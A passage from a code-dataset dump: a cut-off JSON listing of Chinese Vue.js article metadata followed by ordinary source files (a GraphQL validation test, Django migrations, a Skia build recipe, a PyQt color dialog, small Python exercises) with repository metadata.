"omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6854573213632954375", "article_info": {"article_id": "6854573213632954375", "user_id": "1679709498776280", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "https://juejin.im/post/6854573213632954375", "cover_image": "", "is_gfw": 0, "title": "Vue.js源码学习(完结)-虚拟DOM的patch算法", "brief_content": "虚拟DOM将虚拟节点vnode和旧虚拟节点oldVnode进行对比,得出真正需要更新的节点进行DOM操作。对两个虚拟节点进行对比是虚拟DOM中最核心的算法(即patch)。 由于Vue.js的变化侦测粒度很细,一定程度上可以知道哪些状态发生了变化,所以可以通过细粒度的绑定来更新…", "is_english": 0, "is_original": 1, "user_index": 2.7095112913515, "original_type": 0, "original_author": "", "content": "", "ctime": "1595317609", "mtime": "1599099496", "rtime": "1595336975", "draft_id": "6854812664749621256", "view_count": 330, "collect_count": 3, "digg_count": 2, "comment_count": 0, "hot_index": 18, "is_hot": 0, "rank_index": 0.00012914, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1679709498776280", "user_name": "小宝的挖机", "company": "", "job_title": "前端工程师", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/638ceb6a3b77b2eef933e1c2996c07d2~300x300.image", "level": 2, "description": "", "followee_count": 7, "follower_count": 44, "post_article_count": 85, "digg_article_count": 151, "got_digg_count": 301, "got_view_count": 28172, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 585, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6854573213632954375, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844903968791855111", "article_info": {"article_id": "6844903968791855111", "user_id": "3333374985120024", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "https://juejin.im/post/6844903968791855111", "cover_image": "", "is_gfw": 0, "title": "Electron + Vue + Vscode构建跨平台应用(四)利用Electron-Vue构建Vue应用详解", "brief_content": "主进程是指: 运行 package.json 里面 main 脚本的进程成为主进程。 渲染进程是指: 每个 electron 的页面都运行着自己的进程,称为渲染进程。 通俗的来讲主进程也就是 npm run start 出来的窗口,而窗口里面的内容,即是渲染进程。", "is_english": 0, "is_original": 1, "user_index": 0.003086090311724, "original_type": 0, "original_author": "", "content": "", "ctime": "1571301659", "mtime": "1600155867", "rtime": "1571324971", "draft_id": "6845076499368771597", "view_count": 804, "collect_count": 3, "digg_count": 0, "comment_count": 0, "hot_index": 40, "is_hot": 0, "rank_index": 0.00012898, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3333374985120024", "user_name": "Yi_Master", "company": "", "job_title": "", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2018/1/15/160f773f2b9fda91~tplv-t2oaga2asx-image.image", "level": 2, "description": "移动端App,Framework,JS等", "followee_count": 0, "follower_count": 24, "post_article_count": 14, "digg_article_count": 0, "got_digg_count": 12, "got_view_count": 14458, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 156, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6844903968791855111, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844903518344577037", "article_info": {"article_id": "6844903518344577037", "user_id": "3474112473989448", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809640407484334093, 6809640398105870343, 6809640403516522504], "visible_level": 0, "link_url": "https://github.com/berwin/Blog/issues/17", "cover_image": "", "is_gfw": 0, "title": "深入浅出 - vue变化侦测原理", "brief_content": "一年前我写过一篇 响应式原理的文章,但是最近我发现讲的内容和我现在心里想的有些不太一样,所以我重写一篇文章。 我的目标是能让读者读完我写的文章能学到知识,有一部分文章标题都以深入浅出开头,目的是把一个复杂的东西排除掉干扰学习的因素后剩下的核心原理通过很简单的描述来让读者学习到知识", "is_english": 0, "is_original": 0, "user_index": 0, "original_type": 1, "original_author": "", "content": "", "ctime": "1512356773", "mtime": "1598438903", "rtime": "1512356773", "draft_id": "0", "view_count": 719, "collect_count": 24, "digg_count": 51, "comment_count": 11, "hot_index": 97, "is_hot": 0, "rank_index": 0.00012888, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3474112473989448", "user_name": "玖五", "company": "阿里巴巴 - 淘系技术部", "job_title": "前端技术专家", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/6e896367e48d45745bc6362bf2ec6cdb~300x300.image", "level": 3, "description": "畅销书《深入浅出Vue.js》作者,负责阿里淘系大促(天猫双11,618等)主会场终端渲染架构,双11大促消防员👨🚒、中专毕业、95后。\n\n爱好:写作、金融,飙各种交通工具(🚴♀️🛴🏍️🚗),滑雪🏂\n\nGitHub:github.com/berwin", "followee_count": 30, "follower_count": 2934, "post_article_count": 27, "digg_article_count": 41, "got_digg_count": 1624, "got_view_count": 71863, "post_shortmsg_count": 10, "digg_shortmsg_count": 23, "isfollowed": false, "favorable_author": 0, "power": 2099, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}, {"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631693185, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398957}, {"id": 2546523, "tag_id": "6809640403516522504", "tag_name": "API", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/a7c8e10a9c742fc175f9.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435971240, "mtime": 1631683137, "id_type": 9, "tag_alias": "", "post_article_count": 7154, "concern_user_count": 88261}], "user_interact": {"id": 6844903518344577037, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}], "cursor": "eyJ2IjoiNzAwNzI1MjQ2NDcyNjQ1ODM5OSIsImkiOjEwMjYwfQ==", "count": 11060, "has_more": true} | [
"[email protected]"
] | |
8655a86f4d99e4dc3d21d0a740e200eda1cd4269 | 66643f48950453dd1cc408a763360db2be9942f6 | /tests/validation/test_executable_definitions.py | 4a21c63b65e4397cb38e995fa01b69400852109f | [
"MIT"
] | permissive | khasbilegt/graphql-core | ac958b5a68c27acd0c7f96429deeca7f7f8736b3 | fc76d01a2a134ba2cebd863bf48773fd44c2645b | refs/heads/main | 2023-08-05T06:03:56.299244 | 2021-09-19T10:31:30 | 2021-09-19T10:31:30 | 408,735,141 | 1 | 0 | MIT | 2021-09-21T08:00:36 | 2021-09-21T08:00:35 | null | UTF-8 | Python | false | false | 2,234 | py | from functools import partial
from graphql.validation import ExecutableDefinitionsRule
from .harness import assert_validation_errors
assert_errors = partial(assert_validation_errors, ExecutableDefinitionsRule)
assert_valid = partial(assert_errors, errors=[])
def describe_validate_executable_definitions():
def with_only_operation():
assert_valid(
"""
query Foo {
dog {
name
}
}
"""
)
def with_operation_and_fragment():
assert_valid(
"""
query Foo {
dog {
name
...Frag
}
}
fragment Frag on Dog {
name
}
"""
)
def with_type_definition():
assert_errors(
"""
query Foo {
dog {
name
}
}
type Cow {
name: String
}
extend type Dog {
color: String
}
""",
[
{
"message": "The 'Cow' definition is not executable.",
"locations": [(8, 13)],
},
{
"message": "The 'Dog' definition is not executable.",
"locations": [(12, 13)],
},
],
)
def with_schema_definition():
assert_errors(
"""
schema {
query: Query
}
type Query {
test: String
}
extend schema @directive
""",
[
{
"message": "The schema definition is not executable.",
"locations": [(2, 13)],
},
{
"message": "The 'Query' definition is not executable.",
"locations": [(6, 13)],
},
{
"message": "The schema definition is not executable.",
"locations": [(10, 13)],
},
],
)
| [
"[email protected]"
] | |
6d8b0b5732d62a9cf3767687b8e8763bebd74f0c | 0c154919a427bad71598bae69a8b5b6b94bc2627 | /Posts/migrations/0008_post_vote.py | 1f9c7557cad3250dbbcd9af07789b7d0075280aa | [] | no_license | MichalDrosio/blog | b7b56ffd35ef82d2a5c3c791eff8d326644f5627 | ebb7c07f29ea9de1f872bfeea79ae6d0c4822766 | refs/heads/master | 2020-12-22T13:02:54.573249 | 2020-07-27T11:25:16 | 2020-07-27T11:25:16 | 236,775,255 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | # Generated by Django 3.0.8 on 2020-07-24 10:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Posts', '0007_auto_20200723_1357'),
]
operations = [
migrations.AddField(
model_name='post',
name='vote',
field=models.PositiveIntegerField(default=0),
),
]
| [
"[email protected]"
] | |
629bb2ace85054f0e0e1bf16e25f739810db624e | 0e834094f5e4274b279939b81caedec7d8ef2c73 | /m3/django_/mysite3/book/migrations/0003_auto_20200115_1745.py | e90a76a3af2a4b4753b0bf2a493db5ffb36cf7a9 | [] | no_license | SpringSnowB/All-file | b74eaebe1d54e1410945eaca62c70277a01ef0bf | 03485c60e7c07352aee621df94455da3d466b872 | refs/heads/master | 2020-11-27T23:54:36.984555 | 2020-01-21T08:42:21 | 2020-01-21T08:42:21 | 229,651,737 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,176 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2020-01-15 09:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('book', '0002_auto_20200115_1603'),
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, verbose_name='姓名')),
('age', models.IntegerField(default=1, verbose_name='年龄')),
('email', models.EmailField(max_length=254, null=True, verbose_name='邮箱')),
],
),
migrations.AddField(
model_name='book',
name='market_price',
field=models.DecimalField(decimal_places=2, default=0, max_digits=7, verbose_name='图书零售价'),
),
migrations.AddField(
model_name='book',
name='pub',
field=models.CharField(default='', max_length=30, verbose_name='出版社'),
),
]
| [
"[email protected]"
] | |
6267d925f4ba5879b734a6dcba1640ccedeb8b48 | a2eaa3decc385dea227da8a99203f767f32cf941 | /electronic_station/ascending_list.py | 98a5261f1acf37986d291eb1cd62bca1a61480d4 | [] | no_license | vlad-bezden/py.checkio | 94db32111eeeb2cd90c7b3c4606ea72cf2bb6678 | 6cd870ca3056cc9dcdce0ad520c27e92311719b3 | refs/heads/master | 2021-07-01T18:39:35.955671 | 2020-10-05T00:56:38 | 2020-10-05T00:56:38 | 93,111,389 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,075 | py | """Ascending List
https://py.checkio.org/en/mission/ascending-list/
Determine whether the sequence of elements items is ascending so that its
each element is strictly larger than (and not merely equal to) the
element that precedes it.
Input: Iterable with ints.
Output: bool
Output:
is_ascending_all([-5, 10, 99, 123456]). Exec time = 0.000124
is_ascending_set([-5, 10, 99, 123456]). Exec time = 0.000084
is_ascending_all([99]). Exec time = 0.000082
is_ascending_set([99]). Exec time = 0.000057
is_ascending_all([4, 5, 6, 7, 3, 7, 9]). Exec time = 0.000142
is_ascending_set([4, 5, 6, 7, 3, 7, 9]). Exec time = 0.000081
is_ascending_all([]). Exec time = 0.000090
is_ascending_set([]). Exec time = 0.000047
is_ascending_all([1, 1, 1, 1]). Exec time = 0.000103
is_ascending_set([1, 1, 1, 1]). Exec time = 0.000061
Conclusion: using set works faster than iterating using zip
"""
from typing import Callable, Sequence
from timeit import repeat
from dataclasses import dataclass
@dataclass
class Test:
data: Sequence[int]
expected: bool
TESTS = [
Test([-5, 10, 99, 123456], True),
Test([99], True),
Test([4, 5, 6, 7, 3, 7, 9], False),
Test([], True),
Test([1, 1, 1, 1], False),
]
def is_ascending_set(items: Sequence[int]) -> bool:
return sorted(set(items)) == items
def is_ascending_zip(items: Sequence[int]) -> bool:
return all(x < y for x, y in zip(items, items[1:]))
def validate(funcs: Sequence[Callable[[Sequence[int]], bool]]) -> None:
for test in TESTS:
for f in funcs:
result = f(test.data)
assert result == test.expected, f"{f.__name__}({test}), {result = }"
print("PASSED!!!\n")
if __name__ == "__main__":
funcs = [is_ascending_zip, is_ascending_set]
validate(funcs)
for test in TESTS:
for f in funcs:
t = repeat(stmt=f"f({test.data})", repeat=5, number=100, globals=globals())
print(f"{f.__name__}({test.data}). Exec time = {min(t):.6f}")
print()
| [
"[email protected]"
] | |
b03c20c06b007718fdc3396885410fb6db0e19f2 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /hQRuQguN4bKyM2gik_21.py | d59885f89bac86c7d6d3eae679f0d6dbfb33395c | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 195 | py |
def simple_check(a, b):
lo, hi = min(a,b), max(a,b)
cnt = 0
for i in range(lo):
if hi % lo == 0:
cnt += 1
hi = hi - 1
lo = lo - 1
return cnt
| [
"[email protected]"
] | |
021e27b295aa1e58939d5d8842368e01465b03e1 | 746cd1d11eb24e7a987f2dd4db72b68a8e0a5b99 | /android/external/adt-infra/build/scripts/slave/recipes/skia/skia.py | c27eafe8ca462660a9cd4d803724a7fb4193b04d | [] | no_license | binsys/BPI-A64-Android7 | c49b0d3a785811b7f0376c92100c6ac102bb858c | 751fadaacec8493a10461661d80fce4b775dd5de | refs/heads/master | 2023-05-11T18:31:41.505222 | 2020-07-13T04:27:40 | 2020-07-13T12:08:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,098 | py | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Recipe module for Skia builders.
DEPS = [
'json',
'path',
'platform',
'properties',
'raw_io',
'skia',
]
TEST_BUILDERS = {
'client.skia': {
'skiabot-ipad4-000': [
'Test-iOS-Clang-iPad4-GPU-SGX554-Arm7-Debug',
],
'skiabot-linux-tester-000': [
'Test-Ubuntu-GCC-GCE-CPU-AVX2-x86_64-Debug',
'Test-Ubuntu-GCC-GCE-CPU-AVX2-x86_64-Release-TSAN',
'Test-Ubuntu-Clang-GCE-CPU-AVX2-x86_64-Coverage-Trybot',
],
'skiabot-shuttle-ubuntu12-003': [
'Test-ChromeOS-GCC-Link-CPU-AVX-x86_64-Debug',
],
'skiabot-shuttle-ubuntu12-gtx550ti-001': [
'Test-Ubuntu-GCC-ShuttleA-GPU-GTX550Ti-x86_64-Release-Valgrind',
'Test-Ubuntu-GCC-ShuttleA-GPU-GTX550Ti-x86_64-Debug-ZeroGPUCache',
],
'skiabot-shuttle-win8-i7-4790k-001': [
'Perf-Win8-MSVC-ShuttleB-GPU-HD4600-x86_64-Release-Trybot',
],
},
'client.skia.android': {
'skiabot-shuttle-ubuntu12-nexus7-001': [
'Perf-Android-GCC-Nexus7-GPU-Tegra3-Arm7-Release',
'Test-Android-GCC-Nexus7-GPU-Tegra3-Arm7-Debug',
],
},
'client.skia.compile': {
'skiabot-mac-10_8-compile-001': [
'Build-Mac10.8-Clang-Arm7-Debug-Android',
],
'skiabot-linux-compile-000': [
'Build-Ubuntu-GCC-Arm7-Debug-Android',
'Build-Ubuntu-GCC-x86_64-Release-CMake',
],
},
'client.skia.fyi': {
'skiabot-linux-housekeeper-003': [
'Housekeeper-PerCommit',
'Housekeeper-PerCommit-Trybot',
'Perf-Android-GCC-Nexus5-CPU-NEON-Arm7-Release-Appurify',
'Perf-Android-GCC-Nexus5-GPU-Adreno330-Arm7-Release-Appurify',
],
},
}
def RunSteps(api):
api.skia.gen_steps()
def GenTests(api):
def AndroidTestData(builder):
test_data = (
api.step_data(
'get EXTERNAL_STORAGE dir',
stdout=api.raw_io.output('/storage/emulated/legacy')) +
api.step_data(
'read SKP_VERSION',
stdout=api.raw_io.output('42')) +
api.step_data(
'read SKIMAGE_VERSION',
stdout=api.raw_io.output('42'))
)
if 'Test' in builder:
test_data += (
api.step_data(
'exists skia_dm',
stdout=api.raw_io.output(''))
)
if 'Perf' in builder:
test_data += api.step_data(
'exists skia_perf',
stdout=api.raw_io.output(''))
return test_data
for mastername, slaves in TEST_BUILDERS.iteritems():
for slavename, builders_by_slave in slaves.iteritems():
for builder in builders_by_slave:
test = (
api.test(builder) +
api.properties(buildername=builder,
mastername=mastername,
slavename=slavename,
buildnumber=5,
revision='abc123') +
api.path.exists(
api.path['slave_build'].join('skia'),
api.path['slave_build'].join('tmp', 'uninteresting_hashes.txt')
)
)
if 'Test' in builder or 'Perf' in builder:
test += api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42'))
if 'Android' in builder:
ccache = '/usr/bin/ccache' if 'Appurify' in builder else None
test += api.step_data('has ccache?',
stdout=api.json.output({'ccache':ccache}))
if ('Android' in builder and
('Test' in builder or 'Perf' in builder) and
not 'Appurify' in builder):
test += AndroidTestData(builder)
if 'ChromeOS' in builder:
test += api.step_data('read SKP_VERSION',
stdout=api.raw_io.output('42'))
test += api.step_data('read SKIMAGE_VERSION',
stdout=api.raw_io.output('42'))
if 'Trybot' in builder:
test += api.properties(issue=500,
patchset=1,
rietveld='https://codereview.chromium.org')
if 'Win' in builder:
test += api.platform('win', 64)
yield test
builder = 'Test-Ubuntu-GCC-GCE-CPU-AVX2-x86_64-Debug'
yield (
api.test('failed_dm') +
api.properties(buildername=builder,
mastername='client.skia',
slavename='skiabot-linux-tester-000',
buildnumber=6) +
api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42')) +
api.step_data('dm', retcode=1)
)
yield (
api.test('has_ccache_android') +
api.properties(buildername='Build-Ubuntu-GCC-Arm7-Debug-Android',
mastername='client.skia.compile',
slavename='skiabot-linux-compile-000') +
api.step_data(
'has ccache?',
stdout=api.json.output({'ccache':'/usr/bin/ccache'}))
)
builder = 'Test-Android-GCC-Nexus7-GPU-Tegra3-Arm7-Debug'
master = 'client.skia.android'
slave = 'skiabot-shuttle-ubuntu12-nexus7-001'
yield (
api.test('failed_get_hashes') +
api.properties(buildername=builder,
mastername=master,
slavename=slave,
buildnumber=6,
revision='abc123') +
api.step_data(
'has ccache?',
stdout=api.json.output({'ccache':None})) +
AndroidTestData(builder) +
api.step_data('read SKP_VERSION',
stdout=api.raw_io.output('42')) +
api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42')) +
api.step_data('read SKIMAGE_VERSION',
stdout=api.raw_io.output('42')) +
api.step_data('get uninteresting hashes', retcode=1) +
api.path.exists(
api.path['slave_build'].join('skia'),
api.path['slave_build'].join('tmp', 'uninteresting_hashes.txt')
)
)
yield (
api.test('download_and_push_skps') +
api.properties(buildername=builder,
mastername=master,
slavename=slave,
buildnumber=6,
revision='abc123',
test_downloaded_skp_version='2') +
api.step_data(
'has ccache?',
stdout=api.json.output({'ccache':None})) +
AndroidTestData(builder) +
api.step_data('read SKP_VERSION',
stdout=api.raw_io.output('2')) +
api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42')) +
api.step_data('read SKIMAGE_VERSION',
stdout=api.raw_io.output('42')) +
api.step_data(
'exists skps',
stdout=api.raw_io.output('')) +
api.path.exists(
api.path['slave_build'].join('skia'),
api.path['slave_build'].join('tmp', 'uninteresting_hashes.txt')
)
)
yield (
api.test('missing_SKP_VERSION_device') +
api.properties(buildername=builder,
mastername=master,
slavename=slave,
buildnumber=6,
revision='abc123') +
api.step_data(
'has ccache?',
stdout=api.json.output({'ccache':None})) +
AndroidTestData(builder) +
api.step_data('read SKP_VERSION',
retcode=1) +
api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42')) +
api.step_data('read SKIMAGE_VERSION',
stdout=api.raw_io.output('42')) +
api.step_data(
'exists skps',
stdout=api.raw_io.output('')) +
api.path.exists(
api.path['slave_build'].join('skia'),
api.path['slave_build'].join('tmp', 'uninteresting_hashes.txt')
)
)
yield (
api.test('download_and_push_skimage') +
api.properties(buildername=builder,
mastername=master,
slavename=slave,
buildnumber=6,
revision='abc123',
test_downloaded_skimage_version='2') +
api.step_data(
'has ccache?',
stdout=api.json.output({'ccache':None})) +
AndroidTestData(builder) +
api.step_data('read SKP_VERSION',
stdout=api.raw_io.output('42')) +
api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42')) +
api.step_data('read SKIMAGE_VERSION',
stdout=api.raw_io.output('2')) +
api.step_data(
'exists skia_images',
stdout=api.raw_io.output('')) +
api.path.exists(
api.path['slave_build'].join('skia'),
api.path['slave_build'].join('tmp', 'uninteresting_hashes.txt')
)
)
yield (
api.test('missing_SKIMAGE_VERSION_device') +
api.properties(buildername=builder,
mastername=master,
slavename=slave,
buildnumber=6,
revision='abc123') +
api.step_data(
'has ccache?',
stdout=api.json.output({'ccache':None})) +
AndroidTestData(builder) +
api.step_data('read SKP_VERSION',
stdout=api.raw_io.output('42')) +
api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42')) +
api.step_data('read SKIMAGE_VERSION',
retcode=1) +
api.step_data(
'exists skia_images',
stdout=api.raw_io.output('')) +
api.path.exists(
api.path['slave_build'].join('skia'),
api.path['slave_build'].join('tmp', 'uninteresting_hashes.txt')
)
)
builder = 'Test-Ubuntu-GCC-GCE-CPU-AVX2-x86_64-Debug'
master = 'client.skia'
slave = 'skiabot-linux-test-000'
yield (
api.test('missing_SKP_VERSION_host') +
api.properties(buildername=builder,
mastername=master,
slavename=slave,
buildnumber=6,
revision='abc123') +
api.step_data('Get downloaded SKP_VERSION', retcode=1) +
api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42')) +
api.path.exists(
api.path['slave_build'].join('skia'),
api.path['slave_build'].join('tmp', 'uninteresting_hashes.txt')
)
)
yield (
api.test('missing_SKIMAGE_VERSION_host') +
api.properties(buildername=builder,
mastername=master,
slavename=slave,
buildnumber=6,
revision='abc123') +
api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42')) +
api.step_data('Get downloaded SKIMAGE_VERSION', retcode=1) +
api.path.exists(
api.path['slave_build'].join('skia'),
api.path['slave_build'].join('tmp', 'uninteresting_hashes.txt')
)
)
| [
"[email protected]"
] | |
3fc2dbb3e16a2861f18b339ee15022a85d67550f | 6b7bdeff133c37245698e450a01f75bb6a97c2a4 | /28.colordialog.py | 4a47f37fbfa2e3611337d803621896fb32a462cf | [] | no_license | HardPlant/PyQT | 9bb4f8e53417ede638bddd63571ade506785d2fb | fae0315620b3005ead451a170214c1334bac7fab | refs/heads/master | 2020-03-24T23:49:47.248763 | 2018-08-05T07:59:17 | 2018-08-05T07:59:17 | 143,155,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,104 | py | from PyQt5.QtWidgets import (QWidget, QPushButton, QFrame,
QColorDialog, QApplication)
from PyQt5.QtGui import QColor
import sys
class Example(QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
col = QColor(0, 0, 0)
self.btn = QPushButton('Dialog', self)
self.btn.move(20, 20)
self.btn.clicked.connect(self.showDialog)
self.frm = QFrame(self)
self.frm.setStyleSheet("QWidget { background-color: %s }"
% col.name())
self.frm.setGeometry(130, 22, 100, 100)
self.setGeometry(300, 300, 250, 180)
self.setWindowTitle('Color dialog')
self.show()
def showDialog(self):
col = QColorDialog.getColor()
if col.isValid():
self.frm.setStyleSheet("QWidget { background-color: %s }"
% col.name())
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_()) | [
"[email protected]"
] | |
c9f7d93330c888d19c537cb39e06fdd586f5682a | 3411ad233c411c06765f4b07f8670c12025178b6 | /LCOF/31-40/32-1/32-1.py | 478ca7b4eff8a95655fa61b25fb586420bfccdd7 | [
"MIT"
] | permissive | xuychen/Leetcode | 7d9d31fed898ce58440f5ae6665d2ccaf1a4b256 | c8bf33af30569177c5276ffcd72a8d93ba4c402a | refs/heads/master | 2021-11-19T20:39:43.741589 | 2021-10-24T16:26:52 | 2021-10-24T16:26:52 | 140,212,398 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 712 | py | import Queue
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def levelOrder(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
if not root:
return []
queue = Queue.Queue(maxsize=0)
queue.put(root)
result = []
while not queue.empty():
node = queue.get()
result.append(node.val)
if node.left:
queue.put(node.left)
if node.right:
queue.put(node.right)
return result
| [
"[email protected]"
] | |
